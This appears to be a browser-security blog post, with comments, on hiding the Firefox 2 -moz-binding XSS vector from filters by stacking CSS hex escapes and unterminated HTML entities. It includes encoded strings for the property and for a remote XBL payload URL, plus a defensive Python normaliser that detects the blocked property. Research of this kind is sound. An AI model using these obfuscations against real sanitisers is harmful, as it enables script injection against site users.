Moz-binding XSS fun

CSS supports hex encoding within styles, and HTML supports entities, but did you know you could combine them both? I didn’t. To construct an attack similar to the one displayed below you first need to convert your CSS property to hex, so -moz-binding becomes: \2d\6d\6f\7a\2d\62\69\6e\64\69\6e\67. Notice there is no “x” prefix and no leading double zeros like you would see in HTML entities or JavaScript Unicode escapes. The link contains a Hackvertor URL to help you with the conversion.

You can do the same conversion on the value of the property, so the URL of the moz-binding payload, //businessinfo.co.uk/labs/xbl/xbl.xml#xss, becomes: \2f\2f\62\75\73\69\6e\65\73\73\69\6e\66\6f\2e\63\6f\2e\75\6b\2f\6c\61\62\73\2f\78\62\6c\2f\78\62\6c\2e\78\6d\6c\23\78\73\73

I hope you’re following so far; we can now take the property string and encode it further, crazy eh? Any part of the property can now be encoded with HTML entities. I went for the backslash and malformed entities (no terminating semicolon), but you can experiment with different combinations. The property “\2d\6d\6f\7a\2d\62\69\6e\64\69\6e\67” now becomes: &#x5c2d&#x5c6d&#x5c6f&#x5c7a&#x5c2d&#x5c62&#x5c69&#x5c6e&#x5c64&#x5c69&#x5c6e&#x5c67

Here is the final vector with a link to hackvertor for testing:-
The final vector
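As an added illustration (my own code, not from the post or from Hackvertor), here is a small Python normaliser that walks both decoding layers described above before matching a property name: the spec-conformant HTML reading of the entities, which yields the CJK characters riahmatic later reports from the FF3 error console, and an assumed lenient reading that consumes only two hex digits of an unterminated entity, standing in for the FF2 quirk Gareth describes. The two-digit cut-off is my assumption; the post only says FF2 "takes into account the first few characters".

```python
import html
import re

# Constructed from the post: "-moz-binding" as two-digit CSS hex escapes,
# with each backslash replaced by the unterminated entity "&#x5c".
OBFUSCATED_PROPERTY = (
    "&#x5c2d&#x5c6d&#x5c6f&#x5c7a&#x5c2d&#x5c62&#x5c69"
    "&#x5c6e&#x5c64&#x5c69&#x5c6e&#x5c67"
)

# CSS escape: backslash, 1..6 hex digits, optional single whitespace terminator.
# Note "\2d6d" would be ONE code point, which is why the post uses exactly two
# digits per character, each starting with its own backslash.
CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\n]?")

# Assumed quirk (my assumption, not any spec): only two hex digits consumed,
# so "&#x5c2d" yields "\" followed by the literal text "2d".
SHORT_HEX_ENTITY = re.compile(r"&#[xX]([0-9a-fA-F]{1,2});?")


def decode_css_escapes(text: str) -> str:
    """Replace every CSS hex escape with the code point it denotes."""
    return CSS_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)


def decode_entities_strict(text: str) -> str:
    """Standard HTML decoding: '&#x5c2d' (no semicolon) is the single code point U+5C2D."""
    return html.unescape(text)


def decode_entities_lenient(text: str) -> str:
    """Assumed two-digit reading of unterminated entities (stands in for the FF2 quirk)."""
    return SHORT_HEX_ENTITY.sub(lambda m: chr(int(m.group(1), 16)), text)


def css_property_candidates(fragment: str) -> set:
    """All property strings a filter should consider: each entity interpretation,
    followed by CSS escape decoding, lower-cased for matching."""
    return {
        decode_css_escapes(decoder(fragment)).lower()
        for decoder in (decode_entities_strict, decode_entities_lenient)
    }


def mentions_blocked_property(fragment: str, blocked=("-moz-binding",)) -> bool:
    """True if any decoding path of the fragment reveals a blocked property name."""
    return any(b in cand for cand in css_property_candidates(fragment) for b in blocked)
```

A filter that matches the raw attribute text for the literal string -moz-binding sees neither layer; one that normalises only through the strict path sees the CJK string and still misses it.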

6 Responses to “Moz-binding XSS fun”

  1. pdp writes:

    Interesting, I quickly checked the method in Firefox 3 and it doesn’t seem to work. I haven’t checked it in Firefox 2 though.

  2. Gareth Heyes writes:

    Yep, only tested in Firefox 2, although other tricks may be possible with FF3. I might have a go at that some other time 🙂

  3. Gareth Heyes writes:

    Another thing I forgot to mention is that NoScript silently disables moz-binding, so you have to disable NoScript to test the vector.

  4. riahmatic writes:

    error console in FF3:
    Warning: Unknown property ‘尭屭屯屺尭屢屩屮層屩屮屧’. Declaration dropped.

    Though I think FF3 enforces SOP on -moz-binding now anyway, right?

  5. Gareth Heyes writes:

    @riahmatic

    Yep, that’s the expected behavior, but FF2 seems to read the entities first and decode them, but for some reason only takes into account the first few characters (maybe because it’s in a style).

    I’ve not looked at FF3 much yet, but I’m sure to have plenty of fun when I do 🙂 If FF3 does enforce SOP on moz-binding then that’s a good thing, but I’ve not seen it mentioned anywhere.

  6. Vinicius K-Max writes:

    awesome! 🙂